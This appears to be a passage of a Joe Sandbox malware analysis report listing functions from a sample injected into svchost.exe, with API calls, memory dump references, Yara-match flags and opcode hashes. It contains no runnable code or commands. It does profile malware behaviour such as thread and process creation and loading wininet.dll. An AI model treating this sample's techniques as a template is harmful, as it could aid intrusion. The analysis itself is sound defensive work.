                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5ad20d37507022d2f2273f13ea7a713b5c9947c9313c6518467cc18144a7028d
                                                                        • Instruction ID: 5b2508f1a83d2d699049f6d0716aa297cdb4ef6126c4b29bee7b16b2be661737
                                                                        • Opcode Fuzzy Hash: 5ad20d37507022d2f2273f13ea7a713b5c9947c9313c6518467cc18144a7028d
                                                                        • Instruction Fuzzy Hash: C390022160140902D101B258444465A000BC7E0341FD5C023A1024959ECB258A92A135
                                                                        Function 03472D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a54b2899dfc8ca35ca12bdcca9794f85d5d64e0c25401c02d4e9d8d88d6ee4f3
                                                                        • Instruction ID: ffc033f7e1f6c6890b4aac20874f2776d581f4be96ba09313c4e47e33bd37ac5
                                                                        • Opcode Fuzzy Hash: a54b2899dfc8ca35ca12bdcca9794f85d5d64e0c25401c02d4e9d8d88d6ee4f3
                                                                        • Instruction Fuzzy Hash: D790022921340402D180B258544864E0006C7E1302FD5D416A001595CCCB1589695325
                                                                        Function 03472D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f2c96e209ac0d30abacb3cdfe97c92a9a03af4fdca27059db6f32e8a6a1893c8
                                                                        • Instruction ID: 3e068da38f2575aa266daf77abc10c18cfa6c1e4e4eb60675e31b78fc05b6fb4
                                                                        • Opcode Fuzzy Hash: f2c96e209ac0d30abacb3cdfe97c92a9a03af4fdca27059db6f32e8a6a1893c8
                                                                        • Instruction Fuzzy Hash: E690022130140403D140B258545864A4006D7F1301F95D012E0414958CDB1589565226
                                                                        Function 03472DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 9c92a54f9a4b905a300c94c250f8182f472e4bfe2beb934851d46e0a235b45dd
                                                                        • Instruction ID: 59f5aeeb119ec5e2b9127aed687eddae7065d09bc08c4bfc827971450e953640
                                                                        • Opcode Fuzzy Hash: 9c92a54f9a4b905a300c94c250f8182f472e4bfe2beb934851d46e0a235b45dd
                                                                        • Instruction Fuzzy Hash: 60900221242445525545F258444454B4007D7F03417D5C013A1414D54C87269956D625
                                                                        Function 03472DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 46977b51b773d13d9b7de835fdf2022ba2715e9f56745a477666e3357d74669c
                                                                        • Instruction ID: a81098e5722d36f428ef954467ae2455a47630f9ac59229d58944769b4d7c5f7
                                                                        • Opcode Fuzzy Hash: 46977b51b773d13d9b7de835fdf2022ba2715e9f56745a477666e3357d74669c
                                                                        • Instruction Fuzzy Hash: A890023120140813D111B258454474B000AC7E0341FD5C413A042495CD97568A52A125
                                                                        Function 03472C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c1515ba76762767aee053f2ff061a1d560423c64ed3c9c577a0706a4e807a2e5
                                                                        • Instruction ID: bac37f058a9e44e3df3b834c4ea919e15cc8c498e56e899edf1770c556259564
                                                                        • Opcode Fuzzy Hash: c1515ba76762767aee053f2ff061a1d560423c64ed3c9c577a0706a4e807a2e5
                                                                        • Instruction Fuzzy Hash: DA90023120140C42D100B2584444B8A0006C7F0301F95C017A0124A58D8715C9517525
                                                                        Function 03472C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f2b091017c9f28c8a900117e2b27d45c1c94003280a1e4a53f373666f3404167
                                                                        • Instruction ID: b67a08933cf5a815060eef9f3b48562ffb39c8f438640fc5365241e215c9c810
                                                                        • Opcode Fuzzy Hash: f2b091017c9f28c8a900117e2b27d45c1c94003280a1e4a53f373666f3404167
                                                                        • Instruction Fuzzy Hash: 5F90023120148C02D110B258844478E0006C7E0301F99C412A4424A5CD879589917125
                                                                        Function 03472CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 37e6147fe09257f3122507df560be3285eef27172d5cc52c7f670308aa226da7
                                                                        • Instruction ID: 946a263a7d4d4efd4ba6c07d996a6645221cdf0dd07269b2c62c99fa2a5343fa
                                                                        • Opcode Fuzzy Hash: 37e6147fe09257f3122507df560be3285eef27172d5cc52c7f670308aa226da7
                                                                        • Instruction Fuzzy Hash: 4790023120140802D100B698544868A0006C7F0301F95D012A5024959EC76589916135
                                                                        Function 00760DF5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 479 760df5-760df6 480 760e1b-760e6a call 77c070 call 7645c0 call 751470 call 771d10 479->480 481 760df8-760e1a call 77b660 479->481 492 760e6c-760e7b PostThreadMessageW 480->492 493 760e8a-760e90 480->493 481->480 492->493 494 760e7d-760e87 492->494 494->493
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(72945936,00000111,00000000,00000000), ref: 00760E77
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 72945936$72945936
                                                                        • API String ID: 1836367815-646505885
                                                                        • Opcode ID: b7b66841ccd1dcc359b4dde223a7a3e365c346da850d1c2025f1f3d85d26986e
                                                                        • Instruction ID: 5e3c27d8021778cb07079957288cf99a6a72568c71f608b9e609c3e760f6212a
                                                                        • Opcode Fuzzy Hash: b7b66841ccd1dcc359b4dde223a7a3e365c346da850d1c2025f1f3d85d26986e
                                                                        • Instruction Fuzzy Hash: 681138B1C0114CBAEF01AAA08C81EEF7BBCEB05798F448164FA04A3241E5395D068BE1
                                                                        Function 00760E00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 495 760e00-760e12 496 760e1a-760e6a call 77c070 call 7645c0 call 751470 call 771d10 495->496 497 760e15 call 77b660 495->497 507 760e6c-760e7b PostThreadMessageW 496->507 508 760e8a-760e90 496->508 497->496 507->508 509 760e7d-760e87 507->509 509->508
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(72945936,00000111,00000000,00000000), ref: 00760E77
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 72945936$72945936
                                                                        • API String ID: 1836367815-646505885
                                                                        • Opcode ID: dbe5725f5941867727f6a4ce5034651299952f64859f0e0394aac61bf8557a0f
                                                                        • Instruction ID: 63ecda0ff44f6ca49bfe74d2e213c9c513b6b55d58195c032b7d86a8a8c4da23
                                                                        • Opcode Fuzzy Hash: dbe5725f5941867727f6a4ce5034651299952f64859f0e0394aac61bf8557a0f
                                                                        • Instruction Fuzzy Hash: 6901C4B1D0115CBAEB11AAE48C82EEF7B7CDF45794F058068FA04A7141E6685E068BF2
                                                                        Function 0076F5A9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InitializeUninitialize
                                                                        • String ID: @J7<
                                                                        • API String ID: 3442037557-2016760708
                                                                        • Opcode ID: 6a2f5b9287dcb325afedf9cc9deb538138e8142e927f8e99eae6b10b421225ec
                                                                        • Instruction ID: 8c563651ae8a2932efd676ad34158ae90f2180b8c7ac652d459873cd0ba996e3
                                                                        • Opcode Fuzzy Hash: 6a2f5b9287dcb325afedf9cc9deb538138e8142e927f8e99eae6b10b421225ec
                                                                        • Instruction Fuzzy Hash: 383123B5A0060AAFDB10DFD8D8809EEB7B9FF88314B108559E915A7214D775AE05CBA0
                                                                        Function 0076F5B0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InitializeUninitialize
                                                                        • String ID: @J7<
                                                                        • API String ID: 3442037557-2016760708
                                                                        • Opcode ID: b5b5d24e6b64f91af77f115aa64ee472c6cd5b18dcfe081474d73374db37efb5
                                                                        • Instruction ID: 5a9db864554c134842633d0a5d478cfa785f055b3ff888977a9de4118b8f19fb
                                                                        • Opcode Fuzzy Hash: b5b5d24e6b64f91af77f115aa64ee472c6cd5b18dcfe081474d73374db37efb5
                                                                        • Instruction Fuzzy Hash: 62313475A00609AFDB00DFD8D8809EFB7B9FF88304B108559E916E7214D775EE058BA0
                                                                        Function 00773B50 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00773C2B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: wininet.dll
                                                                        • API String ID: 3472027048-3354682871
                                                                        • Opcode ID: 5bf6a71b8d9befcb1f546c76200517df179f4223fe190e1ff9edc745545f0eff
                                                                        • Instruction ID: c2a37cba11a5230e13e123eb80342e267009f04907321a5bd4dfb4ab981503dd
                                                                        • Opcode Fuzzy Hash: 5bf6a71b8d9befcb1f546c76200517df179f4223fe190e1ff9edc745545f0eff
                                                                        • Instruction Fuzzy Hash: 5031A2B1600605BBDB14DFA4C885FEBB7B8FB88744F10851CF61D6B281D774AA408BA4
                                                                        Function 007645C0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00764632
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: ff79105ba4eda4c34d62e1d2641d720007ffb5dd8a5b2f09d5c217583579c30e
                                                                        • Instruction ID: 1b14cd240742cf12f41fded82cbf1e92698751db2c5b1afa7ea53a21e1c165c4
                                                                        • Opcode Fuzzy Hash: ff79105ba4eda4c34d62e1d2641d720007ffb5dd8a5b2f09d5c217583579c30e
                                                                        • Instruction Fuzzy Hash: 94010CB5D4020DBBEF10EAA4DC46F9DB7789B54308F0481A5A90997241F635EB14CB91
                                                                        Function 00779900 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,007683AE,00000010,00000000,?,?,00000044,00000000,00000010,007683AE,?,?,00000000), ref: 00779960
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 16882bb59a27b91d610d4615df323210088e01048f4a6282e7d400d52420b59d
                                                                        • Instruction ID: 2a0909d1e442813ab976062f42696bf499e139f11c4b90092fef82c17e2077d2
                                                                        • Opcode Fuzzy Hash: 16882bb59a27b91d610d4615df323210088e01048f4a6282e7d400d52420b59d
                                                                        • Instruction Fuzzy Hash: 2401DDB2205148BBDB48DF99DC81EEB77ADAF8C754F408208BA1DE3241D630F8518BA4
                                                                        Function 00759E50 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00759E95
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: ff57c9e718e5094546e8ca57f8baed57ff3df2d6420d1bf538e82e9d3bbfccb2
                                                                        • Instruction ID: 02034312f6aa1e1826730f879abd19d49804183d3e2effab8a0ca69394b07e01
                                                                        • Opcode Fuzzy Hash: ff57c9e718e5094546e8ca57f8baed57ff3df2d6420d1bf538e82e9d3bbfccb2
                                                                        • Instruction Fuzzy Hash: EAF0657334020476E73165E99C07FEB738CDB85BA2F550429FB0CEB1C0D995B84142E5
                                                                        Function 00759E4A Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00759E95
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: a52c162f34ba95473b139bb407793ecac47cd5daeb32478411856721fe926246
                                                                        • Instruction ID: 8562facd0e6867af4ca1ce3a258813f166aad6eba81443bbc081ee464cb42c92
                                                                        • Opcode Fuzzy Hash: a52c162f34ba95473b139bb407793ecac47cd5daeb32478411856721fe926246
                                                                        • Instruction Fuzzy Hash: 52F02B7324020076D33062E48C07FD7228CCF85792F250019FB0CEB1C1D9D9B80147E4
                                                                        Function 00779870 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C1F85D8B,00000007,00000000,00000004,00000000,00763E3D,000000F4), ref: 007798AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: 632fd65b2b51fd1a652c04687d9fb30c2d13ce3d8a1435a1acbd1798a4f6cfb8
                                                                        • Instruction ID: c6e7d5313e4b7462fbe1330377e5f702aaaefafcba3c85821441155aef0e5972
                                                                        • Opcode Fuzzy Hash: 632fd65b2b51fd1a652c04687d9fb30c2d13ce3d8a1435a1acbd1798a4f6cfb8
                                                                        • Instruction Fuzzy Hash: 01E065B6200208BBDA14EF58DC46EAB73ADEFC9715F408408FA08A7241C670B8118AB5
                                                                        Function 00779820 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00761A89,?,?,00761A89,?Ww,?,?,00761A89,?Ww,00001000,?,?,00000000), ref: 0077985C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: cbed1c5dadce8dee4f5864739191d440a36e63c66ed89e5065b9b69a9647fa94
                                                                        • Instruction ID: 943db5cf7352ff96e9bd0b50207db4acdad83ea3cba17abdfa4a162771118c68
                                                                        • Opcode Fuzzy Hash: cbed1c5dadce8dee4f5864739191d440a36e63c66ed89e5065b9b69a9647fa94
                                                                        • Instruction Fuzzy Hash: C2E06D75204204BBD614EE58DC45FAB37ADEFC5750F404419F908A7241C670B8118BB5
                                                                        Function 007683F0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0076841C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: fe3a8205f548bab260e7cd46b00ced602cec4903c88813c3e21c41070a38aa0b
                                                                        • Instruction ID: db4973be84be35f634dd4868efdd8d5e0a91f13763761c82c5994dcbea9e1e03
                                                                        • Opcode Fuzzy Hash: fe3a8205f548bab260e7cd46b00ced602cec4903c88813c3e21c41070a38aa0b
                                                                        • Instruction Fuzzy Hash: 9EE0263520020427FB206EB8EC86F6233489B48720F184B60BD1DDB6C2ED3CF8018250
                                                                        Function 007683E9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0076841C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: eac3ba67f7b3937cfecc90cd7ae0d4243b74fb05bdcf39fa88f826da1d5ecb3a
                                                                        • Instruction ID: 806433d89329306188d8029b06daa25b834a6520aa4bf7ea5e697c86b0f5632d
                                                                        • Opcode Fuzzy Hash: eac3ba67f7b3937cfecc90cd7ae0d4243b74fb05bdcf39fa88f826da1d5ecb3a
                                                                        • Instruction Fuzzy Hash: 37E026F960820126EB6139B86E8672E36149B44760F2D4F00FE2E8A2C3E83CE4029652
                                                                        Function 007681D9 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00761D90,0077807F,?Ww,00761D56), ref: 00768213
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 631cf9fcb14fbc0b6e67b98cd421a954d82a8f70c883a99ae798724acd3eb44d
                                                                        • Instruction ID: 1482850d21765d5d101d8eadb309774060283622bde4d822e479e60ef629380e
                                                                        • Opcode Fuzzy Hash: 631cf9fcb14fbc0b6e67b98cd421a954d82a8f70c883a99ae798724acd3eb44d
                                                                        • Instruction Fuzzy Hash: A7E0C2717802006AFB41B6F08C4BFB932486B04390F1580A4BE0CDB5C2E969F5418364
                                                                        Function 007681E0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00761D90,0077807F,?Ww,00761D56), ref: 00768213
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: f88d1ffb89c2eb10aab9401e585b83d442ef001d3f6e9363ea0bf427aa6656de
                                                                        • Instruction ID: 30d304aa52d61d023126e8d5bba3fff5b7b7fb4d65320c886ebb66e7c91d0df2
                                                                        • Opcode Fuzzy Hash: f88d1ffb89c2eb10aab9401e585b83d442ef001d3f6e9363ea0bf427aa6656de
                                                                        • Instruction Fuzzy Hash: 17D05E712802047BFA51A6B59C0BF66328C5B047A4F558464BF4CE72C2E869F4008665
                                                                        Function 03472C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 361699771760aa7245790f27e8a9b46a8e6ad34475901b572e98c609debcbedf
                                                                        • Instruction ID: 8f8620567cc94c6ef084f93af80d3e55f75ec2df566e58a965bfb607d0785538
                                                                        • Opcode Fuzzy Hash: 361699771760aa7245790f27e8a9b46a8e6ad34475901b572e98c609debcbedf
                                                                        • Instruction Fuzzy Hash: 91B09B719015C5C9DA11F760460875B7905A7E0701F59C463D3030A55E4779C1D1E179

                                                                        Non-executed Functions

                                                                        Function 034AD1C0 Relevance: .1, Instructions: 135COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
